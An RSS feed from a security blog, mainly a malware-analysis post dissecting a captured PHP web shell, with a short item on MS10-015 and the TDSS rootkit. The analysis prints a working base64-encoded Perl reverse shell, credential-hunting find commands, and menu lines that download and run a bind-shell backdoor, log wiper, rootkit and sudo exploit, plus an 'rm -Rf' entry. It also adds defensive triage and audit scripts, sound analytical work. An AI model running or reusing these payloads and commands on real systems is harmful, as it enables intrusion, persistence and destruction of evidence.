<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Irregular Expressions &#187; rootkit</title>
	<atom:link href="http://itknowledgeexchange.techtarget.com/Irregular-Expressions/tag/rootkit/feed/" rel="self" type="application/rss+xml" />
	<link>http://itknowledgeexchange.techtarget.com/Irregular-Expressions</link>
	<description>Insight into current security related events and exploits, including virtualization security and tips.</description>
	<lastBuildDate>Sun, 28 Apr 2013 08:00:32 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>Casper RFI crack bot &#8211; Part 4</title>
		<link>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-4/</link>
		<comments>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-4/#comments</comments>
		<pubDate>Sat, 21 Aug 2010 05:26:12 +0000</pubDate>
		<dc:creator>Dan O'Connor</dc:creator>
				<category><![CDATA[backdoor]]></category>
		<category><![CDATA[casper]]></category>
		<category><![CDATA[perl rfi crack bot]]></category>
		<category><![CDATA[rootkit]]></category>
		<category><![CDATA[sudo exploit]]></category>

		<guid isPermaLink="false">http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-4/</guid>
		<description><![CDATA[sh.txt This one also looks juicy! Another php, &#60;?php $sh_id = &#8220;Q2FTcEVyX0thRUB5YWhPTy5jT20=&#8221;; $sh_ver = &#8220;0.0 01.01.2010&#8243;; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = &#8220;http://xxxxxx.ru/config/&#8221;; $html_start = &#8221;. &#8216;&#60;html&#62;&#60;head&#62; &#60;title&#62;&#8217;.getenv(&#8220;HTTP_HOST&#8221;).&#8217; &#8211; &#8216;.$sh_name.&#8217;&#60;/title&#62; &#60;style type=&#8221;text/css&#8221;&#62; &#60;!&#8211; What are you up to with this one? We have lots of toys to play with. //Authentication $login = ""; $pass = ""; [...]]]></description>
				<content:encoded><![CDATA[<p>sh.txt</p>
<p>This one also looks juicy!</p>
<p>Another PHP script. Its header (quotes restored; WordPress had smart-quoted them):</p>
<pre>&lt;?php
$sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20=";
$sh_ver = "0.0 01.01.2010";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://xxxxxx.ru/config/";
$html_start = ''.
'&lt;html&gt;&lt;head&gt;
&lt;title&gt;'.getenv("HTTP_HOST").' - '.$sh_name.'&lt;/title&gt;
&lt;style type="text/css"&gt;
&lt;!--</pre>
<p>What are you up to with this one?</p>
<p>We have lots of toys to play with.</p>
<pre>//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password already md5-hashed. If empty, md5($pass) is used.
$host_allow = array("*"); //Example: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //HTTP-Auth prompt
$accessdeniedmess = "&lt;a href=\"$sh_mainurl\"&gt;".$sh_name."&lt;/a&gt;: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //If TRUE, update the shell now.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //If TRUE, do not change modification and access times.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email address the log is sent to.
$sort_default = "0a"; //Sort order: 0 - column number, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE, remember the sort order in a cookie.
$sess_cookie = "c99shvars"; //Cookie variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Delete copied files after they are pasted
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}</pre>
<p>Next come a few functions for checking and reporting disk usage.</p>
<p>Now this is worth tracking down.</p>
<pre>//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV)) {
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
} else {
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search</pre>
<p>The link is a milw0rm search for the detected kernel release (or, off Linux, the OS name and major version): a one-click lookup for local privilege-escalation exploits against this box. Note the bare constants in php_uname(r) and php_uname(s); PHP 5 treats an undefined constant as the string of its own name (with a notice), so the calls still work. I wish milw0rm was still around so we could see what would have come up <img src='http://itknowledgeexchange.techtarget.com/Irregular-Expressions/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>Here are a few things that are encoded rather than encrypted. This one is plain base64 and the variable name gives it away: decoded, $back_connect_pl is a Perl reverse shell (it announces itself as "w4ck1ng-shell (Private Build v0.3)") that connects to the host and port passed on its command line, points STDIN, STDOUT and STDERR at the socket, prints uname -a, id and pwd, and hands the connection to /bin/sh. It also sets $0 to "lynx" so the process shows up under an innocent name.</p>
<pre>$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7
DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k
QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll
KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+
JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl
bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i
Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";</pre>
<p>And a few others, no point in sharing <img src='http://itknowledgeexchange.techtarget.com/Irregular-Expressions/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
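<p>A triage script for artifacts like this one, added here as an example and not code from the original post or from the shell's author: it pulls base64-looking string literals out of PHP source, decodes them the way PHP's base64_decode would (ignoring embedded whitespace, which matters because the blob above is wrapped over several lines), names the payload from its first bytes, and flags indicator strings taken from the shell's own source above (the c99shvars cookie, the fx29sh_update.php URL, the disable_functions probe, the milw0rm link). The sample PHP and the Perl stub inside it are constructed; the stub only prints id and is not the real back-connect.</p>

```python
"""Triage for a PHP web shell of the fx29sh/c99sh family.

Added example, not code from the original post or the shell's author.
"""
import base64
import binascii
import re

# Indicator strings lifted from the shell source quoted in the post.
INDICATORS = {
    "c99shvars": "c99sh session cookie name",
    "fx29sh_update.php": "fx29sh self-update URL",
    "disable_functions": "probes disable_functions to route around it",
    "milw0rm.com/search.php": "builds an exploit search link for the local kernel",
    "back_connect": "carries a back-connect (reverse shell) payload",
}

# A PHP variable assigned one long double-quoted base64-alphabet literal.
# Whitespace is allowed inside: the blob in the post is wrapped over lines.
_B64_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/=\s]{40,})"\s*;')


def classify(payload: bytes) -> str:
    """Name a decoded payload from its leading bytes."""
    if payload.startswith(b"#!"):
        interp = payload.split(b"\n", 1)[0].strip().decode("ascii", "replace")
        return "script " + interp
    if payload.startswith(b"\x7fELF"):
        return "ELF binary"
    if payload.startswith(b"MZ"):
        return "PE binary"
    if b"<?php" in payload[:64]:
        return "PHP source"
    return "unknown"


def decode_blobs(php_src: str) -> dict:
    """Map variable name -> (classification, decoded bytes) for each embedded blob."""
    found = {}
    for name, blob in _B64_ASSIGN.findall(php_src):
        compact = re.sub(r"\s+", "", blob)  # PHP's base64_decode skips whitespace too
        try:
            data = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but was not; leave it for manual review
        found[name] = (classify(data), data)
    return found


def find_indicators(php_src: str) -> list:
    """Human-readable reasons this file looks like the shell above."""
    return [why for needle, why in INDICATORS.items() if needle in php_src]


def triage(php_src: str) -> dict:
    """One-shot summary: matched indicators plus the type of every decoded blob."""
    return {
        "indicators": find_indicators(php_src),
        "payloads": {name: kind for name, (kind, _) in decode_blobs(php_src).items()},
    }


# Constructed sample in the shape of the shell quoted above. The Perl stub
# only prints `id`; it is NOT the real back-connect from the post.
PERL_STUB = b"#!/usr/bin/perl\nuse Socket;\nprint `id`;\n"
SAMPLE_PHP = (
    '<?php\n'
    '$sess_cookie = "c99shvars";\n'
    '$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";\n'
    '$disablefunc = @ini_get("disable_functions");\n'
    '$back_connect_pl = "' + base64.b64encode(PERL_STUB).decode() + '";\n'
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PHP), indent=2))
```

<p>Run it over every .php file in a webroot you suspect; a hit on the indicator list is a strong signal, a decoded blob starting with a shebang or ELF header in a "config" directory is one you should not need a signature for. The disable_functions probe is worth a second look from the hardening side: the shell reads that setting only to pick whichever exec primitive is still allowed, so treat disable_functions as defence in depth, not as a sandbox.</p>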
<p>The shell also ships a long menu of canned commands, nearly all of it reconnaissance: SUID and SGID binaries, world-writable files and directories, and the usual credential files (config.inc.php, .htpasswd, .bash_history, .fetchmailrc, service.pwd).</p>
<pre>  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")
  );</pre>
<p>OK now this is nice!</p>
<pre>  $cmdaliases2 = array(
    array("wget &amp; extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget &amp; extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2&gt; /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2&gt; /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux &amp; BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget &amp; run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  );</pre>
<p>The second menu goes well beyond looking around. It fetches psyBNC and EggDrop from the operator's own server, checks for downloaders and for gcc (the log wiper and the sudo exploit arrive as C source), pulls the zap2 log wiper and the RatHole 1.2 rootkit from Packet Storm, drops a bind-shell backdoor (BindDoor, run as a binary named 4877) from the operator's toolz directory, and grabs a local sudo exploit from SecurityFocus. There is also a "Format box" entry wired to rm -Rf.</p>
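<p>The two alias menus double as an audit checklist: anything the shell would find on your box, you want to have found first. Added example, not from the original post or the shell's author: a Python walk over a directory tree that reports the same things as the shell's find commands (SUID/SGID regular files, world-writable regular files, and filenames from its credential list), plus a passwd(5) parser for its cut ... | grep :: check. The demo tree and the passwd text are constructed; run audit_tree('/') as root for the real thing and diff the result against a saved baseline.</p>

```python
"""Host audit mirroring the reconnaissance in the shell's command menus.

Added example, not code from the original post or the shell's author.
"""
import os
import stat
import tempfile
from pathlib import Path

# Filenames the shell hunts for, taken from its $cmdaliases list above.
CREDENTIAL_NAMES = {"config.inc.php", "service.pwd", ".htpasswd",
                    ".bash_history", ".fetchmailrc"}


def audit_tree(root: str) -> dict:
    """Equivalent of the shell's find commands over one tree.

    Regular files only; unreadable directories are skipped, not fatal.
    """
    found = {"suid_sgid": [], "world_writable": [], "credential_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):  # find / -perm -04000 / -02000
                found["suid_sgid"].append(path)
            if st.st_mode & stat.S_IWOTH:                     # find / -perm -2
                found["world_writable"].append(path)
            if name in CREDENTIAL_NAMES or name.startswith("config"):  # -name "config*"
                found["credential_files"].append(path)
    for paths in found.values():
        paths.sort()
    return found


def empty_password_users(passwd_text: str) -> list:
    """Accounts with an empty password field: the shell's `cut ... /etc/passwd | grep ::`."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            users.append(fields[0])
    return users


# Constructed passwd(5) text; 'guest' has an empty password field.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "guest::1001:1001::/home/guest:/bin/sh\n"
)


def build_demo_tree(base: str) -> None:
    """Constructed tree: one SUID file, one world-writable upload, one .htpasswd."""
    www = Path(base, "var", "www")
    www.mkdir(parents=True)
    suid = Path(base, "suidbin")
    suid.touch()
    suid.chmod(0o4755)
    upload = www / "upload.php"
    upload.touch()
    upload.chmod(0o666)
    htpasswd = www / ".htpasswd"
    htpasswd.touch()
    htpasswd.chmod(0o600)


def run_demo() -> dict:
    """Build the demo tree in a temp dir, audit it, return root-relative paths."""
    with tempfile.TemporaryDirectory() as base:
        build_demo_tree(base)
        report = audit_tree(base)
        return {k: [os.path.relpath(p, base) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    for key, paths in run_demo().items():
        print(key, paths)
    print("empty passwords:", empty_password_users(SAMPLE_PASSWD))
```

<p>The point of the baseline is the diff: a new SUID file under /var/www, or a world-writable file in /etc, is exactly what this shell's operator is looking for, and on a box you administer it should never be news to you first.</p>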
<p>This is a big one, I will have to continue this tomorrow.</p>
<!-- wpms-network-global-inserts -->]]></content:encoded>
			<wfw:commentRss>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-4/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS10-015 Reboots Solved?</title>
		<link>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/ms10-015/</link>
		<comments>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/ms10-015/#comments</comments>
		<pubDate>Sat, 13 Feb 2010 03:56:04 +0000</pubDate>
		<dc:creator>Dan O'Connor</dc:creator>
				<category><![CDATA[ms10-015]]></category>
		<category><![CDATA[root kit]]></category>
		<category><![CDATA[rootkit]]></category>
		<category><![CDATA[tdss]]></category>

		<guid isPermaLink="false">http://itknowledgeexchange.techtarget.com/Irregular-Expressions/?p=51</guid>
		<description><![CDATA[After a lot of discussion on the sans diary ( sans.isc.sans.org )  it appears the MS10-015 rebooting machines have been traced back to a root kit (Tdss), more information about it can be found at http://www.prevx.com/blog/139/Tdss-rootkit-silently-owns-the-net.html .  Emergingthreats.net has had signatures since Oct &#38; Jan 09 and from some of the reports out, the major [...]]]></description>
				<content:encoded><![CDATA[<p>After a lot of discussion on the sans diary ( sans.isc.sans.org )  it appears the MS10-015 rebooting machines have been traced back to a root kit (Tdss), more information about it can be found at http://www.prevx.com/blog/139/Tdss-rootkit-silently-owns-the-net.html .  Emergingthreats.net has had signatures since Oct &amp; Jan 09 and from some of the reports out, the major AV vendors are able to detect it as long as it is not running on the infected OS.</p>
<p>Now it&#8217;s going to be a race between system administrators to apply the MS10-015 to detect the root kit and the malware authors to update it so the patch won&#8217;t cause the system to blue screen and reveal the infection.</p>
<p>The number of reports of users having issues with the blue screen is surprising, cases like this are excellent reasons to have effective NIDS deployed.  Malware like Tdss needs to check in and when it does that it cannot hide anymore.</p>
<p>The full discussion is available here http://isc.sans.org/diary.html?storyid=8209#comment .</p>
<!-- wpms-network-global-inserts -->]]></content:encoded>
			<wfw:commentRss>http://itknowledgeexchange.techtarget.com/Irregular-Expressions/ms10-015/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
